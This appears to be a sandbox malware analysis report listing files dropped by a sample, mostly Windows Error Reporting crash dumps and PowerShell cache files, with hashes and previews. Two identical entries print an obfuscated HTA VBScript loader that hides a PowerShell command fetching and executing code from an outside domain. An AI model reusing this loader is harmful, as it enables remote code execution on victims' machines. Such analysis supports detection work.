        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_UPa_d9f780498594a535678cbf25bbc693cb18cc1f55_4443b3a3_b4fa3f81-04cc-435e-81b7-4001bfc48870\Report.wer

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):65536
        Entropy (8bit):0.806245361171172
        Encrypted:false
        SSDEEP:96:QuFa2nzixyKyFsja4Rv57qhK6tQXIDcQnc6PcEwcw35XaXz+HbHgSQgJjBuUXqO+:/Q2zixyFFk0ZLKdjDuzuiFsZ24lO84
        MD5:FFC0EB8913F00096B7D7FDA35530CC7F
        SHA1:93439850F2AEDA604487C6D22AA66B1C3662FD67
        SHA-256:FDA30AF1A73EECC3251C5637C10E3F22C79BAE13F181D48380BBFB7B9AB1B130
        SHA-512:140D166486F5A9DEAA71A6A0B5F0E0BCEA3ABF10A20E09D7BD2010F6C31808EAAC68701AAE43879014D7A32DE1DD6B1E8A6F211FA2F469B2EA8DCB468BB565D8
        Malicious:false
        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.3.1.1.5.5.1.7.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.0.8.6.7.6.1.3.5.8.4.2.6.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.f.a.3.f.8.1.-.0.4.c.c.-.4.3.5.e.-.8.1.b.7.-.4.0.0.1.b.f.c.4.8.8.7.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.5.b.d.b.b.2.-.3.d.3.9.-.4.c.9.9.-.8.1.1.6.-.9.1.e.9.c.e.d.c.1.c.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.U.P.a.z.T.g.V.G.A.7...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.b.0.-.0.0.0.1.-.0.0.1.4.-.d.b.9.f.-.7.6.0.f.6.2.a.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.d.d.3.9.9.a.e.4.6.3.0.3.3.4.3.f.9.f.0.d.a.1.8.9.a.e.e.1.1.c.6.7.b.d.8.6.8.2.2.2.!.

        C:\ProgramData\Microsoft\Windows\WER\Temp\WER162D.tmp.dmp

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:Mini DuMP crash report, 14 streams, Wed May 22 16:06:59 2024, 0x1205a4 type
        Category:dropped
        Size (bytes):57162
        Entropy (8bit):1.6561364730881172
        Encrypted:false
        SSDEEP:96:5A8MGFkG2nZvM4lNPVasuuFxHuwoi7MMU14cQj/8KWuTQY9uX+rKWI1jIBY5jCxo:tvkwOMMu4cQj/8csYd0jCdImS
        MD5:77C9492D6FCE30A2485484DD305C6357
        SHA1:A6AE1569D553FC10C6065CD7836C1B0E2BB1B267
        SHA-256:D371A3965A6E022105B750F5D0F598F13F11B130045881F239ED18C4BFA0819B
        SHA-512:837EC87C1F7C8AC8D013255CC4A1079E25E842902F9F5EE00005B2169C5B30E947440AE009E2AF811C4793CF98E0F76D514F6DC92C5A3765FF88607330DBDB58
        Malicious:false
        Preview:MDMP..a..... .......#.Nf........................h................+..........T.......8...........T.......................................................................................................................eJ..............Lw......................T...........".Nf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\ProgramData\Microsoft\Windows\WER\Temp\WER16DA.tmp.WERInternalMetadata.xml

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):8582
        Entropy (8bit):3.6934623016501518
        Encrypted:false
        SSDEEP:192:R6l7wVeJQdC6YaotgmfrSQprp89bOrkfGam:R6lXJKC6YNtgmfrSzOofi
        MD5:7104251B5CF5279FAFF29DE2168B47ED
        SHA1:CAC2905B46C2A32F1D8E5DE78AADC2FA41F2D33F
        SHA-256:8B19D2D9A67344F8AF12E67FB492C619806056CC712A422F1ED84F21D9F386DB
        SHA-512:6FB86CAA9AD2BDF695F6106256FD363392C1FB7AE06BD063A9C485041649EF4FDB2A9E2AA76C07B611522E8FA95622DD2621F717065CA8188A976CB0C6E20F1C
        Malicious:false
        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.7.6.<./.P.i.

        C:\ProgramData\Microsoft\Windows\WER\Temp\WER171A.tmp.xml

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):4872
        Entropy (8bit):4.483333446283704
        Encrypted:false
        SSDEEP:48:cvIwWl8zsoXJg771I9ViWpW8VYwYm8M4JC9ZC9xyYHFJPyq8vh9xyYAW4ptSTShf:uIjfiI7Wj7VIJDPWAW4poOhhd
        MD5:7A84BC9423FA4F7ECE6461074558CF38
        SHA1:D4D2AD5C3936D9DEE16EF371315CE662D50C884D
        SHA-256:36070425A9343B67C8D53C19807E6A7165C41815D4B50A3AD1DF8F2140F91785
        SHA-512:26FFBDF7EED5001ED6500674DA9FD0F59AD021C859B612AE6C9A0EA11BD67852179AC0893958443E8A4A4988C88A6B2775ED14C9607BDDEB7E0DA65103D2AFF1
        Malicious:false
        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334509" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD46.tmp.dmp

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:Mini DuMP crash report, 14 streams, Wed May 22 16:06:53 2024, 0x1205a4 type
        Category:dropped
        Size (bytes):56506
        Entropy (8bit):1.6764965369557032
        Encrypted:false
        SSDEEP:96:568+KCFkG2nZvM4lNPVasuurJoi7MCnLHERITC6yx1ukRa5sDcAPW9TlWInBlIBw:/V2LOMCnLkRKCf1RbWZDvBE7m
        MD5:41C50213B9FA3447A10C736368408F19
        SHA1:F87AEA54BBA5435CEB3153953C8AE22E64A6F07A
        SHA-256:949A7874D149D666EF720D9E1C75AC9A961397261EE41C5C307E44D7B0F298F4
        SHA-512:A50DA2F4B129DE64D1ECE4E18ACAD76BB3B2A168A69D1049AEA759BB292568B34807A15B2C5AF6BFC9E9E7ADC6424982A243E1C7C081BA91B2A26685F719D5B9
        Malicious:false
        Preview:MDMP..a..... .........Nf........................h................+..........T.......8...........T.......................................................................................................................eJ..............Lw......................T.............Nf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFD66.tmp.dmp

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:Mini DuMP crash report, 14 streams, Wed May 22 16:06:53 2024, 0x1205a4 type
        Category:dropped
        Size (bytes):57126
        Entropy (8bit):1.6673705761018005
        Encrypted:false
        SSDEEP:96:56837FkG2nZvM4lNPVasuux8oi7MQqm71XVybYGHQwQDkTinYebsKjhaNWQQZWIu://COMQqqFybYGHnQDkTin/RhaYQKpNs
        MD5:4172F560570CAD0F598380171221D405
        SHA1:434ED3C586E05A778EC1430A86A10B8EA5BE7C66
        SHA-256:4ABD983EF7F399974D6330B9EBE1C38142506E26C0C09A9ED12CF5AC6203231C
        SHA-512:1018573FBD63143F4E740F9EA38E5EFB2EC94F60742DF393D15E3727571B8253FD17DF915DDD3B844EFA3CC0CFFEAB918840D09A8B7A4941755B2CD9969A9EE8
        Malicious:false
        Preview:MDMP..a..... .........Nf........................h................+..........T.......8...........T.......................................................................................................................eJ..............Lw......................T.......l.....Nf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE13.tmp.WERInternalMetadata.xml

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):8852
        Entropy (8bit):3.6990440053750167
        Encrypted:false
        SSDEEP:192:R6l7wVeJ3G00xq6Yuqhwd13gmfrSQpr+89bkLbf0Mm:R6lXJWm6YTWd13gmfrSSknfW
        MD5:20B828570DD634ECF75A794B9D19BBE0
        SHA1:DB1B58BFEFB901F9AC002F523E05564963499C4F
        SHA-256:5E8B07DB2EABEB49F552F7ADB0F368F26C2C2DD2FCD2E8981BBE612EDEFABA02
        SHA-512:92594BDE75EA52A6A6045CA6B33D918688AAE316AEFAFDEA2A0CC7A4A275E83833E00395A55A80AE2E0AF964979AB198E5969A99E6189585E28A99D8291BD788
        Malicious:false
        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.6.8.<./.P.i.

        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE22.tmp.WERInternalMetadata.xml

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):8844
        Entropy (8bit):3.699082292189259
        Encrypted:false
        SSDEEP:192:R6l7wVeJUMknDNb6YRzNgmfrSQprP89bkybfWMm:R6lXJE96YFNgmfrSVkmf0
        MD5:DF106679817E4355D30E8B8987CC6F8B
        SHA1:4A9F7C754925C801C7808EA4EDFC225F102D7242
        SHA-256:A4C883F3CAF7CA0BEBDA935BB1D2869AA6F0BA1D13AD0E38933D996C9D856CE5
        SHA-512:A067D9CD244F8ADFCFBC40BCA894316C1627E25225BCF2EB10DFBF394FB668EA93BD37F6518BD3547CF80769590FC087C65AA3B053B66711CF8BC741378CED26
        Malicious:false
        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.5.0.4.<./.P.i.

        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE52.tmp.xml

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):4873
        Entropy (8bit):4.482497460548716
        Encrypted:false
        SSDEEP:48:cvIwWl8zsoXJg771I9ViWpW8VYnPYm8M4JC9ZC9xyYHFVoyq8vh9xyYG7ptSTSXd:uIjfiI7Wj7V/JUWG7poOXd
        MD5:1597244FF816D285CD9106E3F8F5596B
        SHA1:B84CA7258E5CB5AA8359D38A48228ED13742FBDB
        SHA-256:54CE3D10B5127341B162EAEC7CE9DEB9595D0CF6F940F38F11BAB3D1642733F9
        SHA-512:ACAD4FCFFDCBC3EE215592B18BDF41145B411F877FE6628909E5EDB0EAD74813D0ED2DAD22E8BCE0455248B7B8BDBBD0F57C7DD3156F94E7BE37FCB35D9E58D3
        Malicious:false
        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334509" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

        C:\ProgramData\Microsoft\Windows\WER\Temp\WERFE71.tmp.xml

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):4873
        Entropy (8bit):4.48401801564365
        Encrypted:false
        SSDEEP:48:cvIwWl8zsoXJg771I9ViWpW8VY+Ym8M4JC9ZC9xyYHFIB6yq8vh9xyYdNptSTSad:uIjfiI7Wj7V6JWB6WPpoOad
        MD5:2EA9F9592F91F9242DE9D82F4C4FF1D3
        SHA1:68A8B7C0D99B5D43BFE8B71631FEF2D75966CDD9
        SHA-256:8BF645724D2FA816ADA516591AEA0C04387929DD64BD7BAC4A1366D652B367D4
        SHA-512:21F2A26CEAA7FA7586AD3C45D14A908206D812F36ABD3A2B8C0B6E86C4D20D0F8D869C8181B1F095775448D73416B3AA076E5E5E5B266B53A54672F770436C77
        Malicious:false
        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="334509" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

        C:\Users\Public\example.hta

        Download File
        Process:C:\Windows\System32\rundll32.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):2331
        Entropy (8bit):2.2639624275996346
        Encrypted:false
        SSDEEP:24:1Ax2kGtrIVP5Db8mF7QdVTMs4CV4no3h25B:1uqlyFaTHukh25B
        MD5:F754844CFB65838D1DD6B19DDE5D835C
        SHA1:B3EB677783ADC88C8D048898449E04D49F416DB6
        SHA-256:3644B387519F3509A1CE3D2201E2E1E8AF36217138CC6F9E62D6E37C887097A6
        SHA-512:F42F89562B5C0BE86DBD04683EE6C30711155ACD1239E273DA726C2BFEDF5D0806C479B7107792C136BFF6E97EFB8D9145DF0C176F499F86F1B7E304A2E3CCDF
        Malicious:false
        Preview:<head>..................................... <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> .. <script type="text/vbscript"> .. Sub Window_OnLoad ....uzctjeus = replace("-CFeoFemFemFeaFenFedFe IFenFevFeoFekFee-EFexpFereFessFeiFeoFenFe Fe(iFerm -UrFei 'iapartmentlistings.com/tykhwuxk')","Fe","") ..hqsumejb = replace("FeSFehFeeFelFelFe.FeAFepFepFelFeiFecFeaFetFeiFeoFenFe","Fe","") ..foucukcj = replace("FepFeoFewFeeFerFesFehFeeFelFel","Fe","") ..CreateObject(hqsumejb).ShellExecute foucukcj, uzctjeus ,"","",0

        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\d[1].txt

        Download File
        Process:C:\Windows\System32\rundll32.exe
        File Type:HTML document, ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):2331
        Entropy (8bit):2.2639624275996346
        Encrypted:false
        SSDEEP:24:1Ax2kGtrIVP5Db8mF7QdVTMs4CV4no3h25B:1uqlyFaTHukh25B
        MD5:F754844CFB65838D1DD6B19DDE5D835C
        SHA1:B3EB677783ADC88C8D048898449E04D49F416DB6
        SHA-256:3644B387519F3509A1CE3D2201E2E1E8AF36217138CC6F9E62D6E37C887097A6
        SHA-512:F42F89562B5C0BE86DBD04683EE6C30711155ACD1239E273DA726C2BFEDF5D0806C479B7107792C136BFF6E97EFB8D9145DF0C176F499F86F1B7E304A2E3CCDF
        Malicious:false
        Preview:<head>..................................... <HTA:APPLICATION icon="#" WINDOWSTATE="minimize" SHOWINTASKBAR="no" SYSMENU="no" CAPTION="no" /> .. <script type="text/vbscript"> .. Sub Window_OnLoad ....uzctjeus = replace("-CFeoFemFemFeaFenFedFe IFenFevFeoFekFee-EFexpFereFessFeiFeoFenFe Fe(iFerm -UrFei 'iapartmentlistings.com/tykhwuxk')","Fe","") ..hqsumejb = replace("FeSFehFeeFelFelFe.FeAFepFepFelFeiFecFeaFetFeiFeoFenFe","Fe","") ..foucukcj = replace("FepFeoFewFeeFerFesFehFeeFelFel","Fe","") ..CreateObject(hqsumejb).ShellExecute foucukcj, uzctjeus ,"","",0

        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):5829
        Entropy (8bit):4.901113710259376
        Encrypted:false
        SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
        MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
        SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
        SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
        SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
        Malicious:false
        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:data
        Category:dropped
        Size (bytes):64
        Entropy (8bit):1.1510207563435464
        Encrypted:false
        SSDEEP:3:Nlllul9kLZ:NllUG
        MD5:087D847469EB88D02E57100D76A2E8E4
        SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
        SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
        SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
        Malicious:false
        Preview:@...e.................................,..............@..........

        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1susrilc.eou.ps1

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode

        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwdzc31e.iyr.psm1

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode

        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emjfwbke.w5l.psm1

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode

        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzni3sjp.fxh.ps1

        Download File
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:ASCII text, with no line terminators
        Category:dropped
        Size (bytes):60
        Entropy (8bit):4.038920595031593
        Encrypted:false
        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
        MD5:D17FE0A3F47BE24A6453E9EF58C94641
        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
        Malicious:false
        Preview:# PowerShell test file to determine AppLocker lockdown mode

        C:\Windows\appcompat\Programs\Amcache.hve

        Download File
        Process:C:\Windows\System32\WerFault.exe
        File Type:MS Windows registry file, NT/2000 or above
        Category:dropped
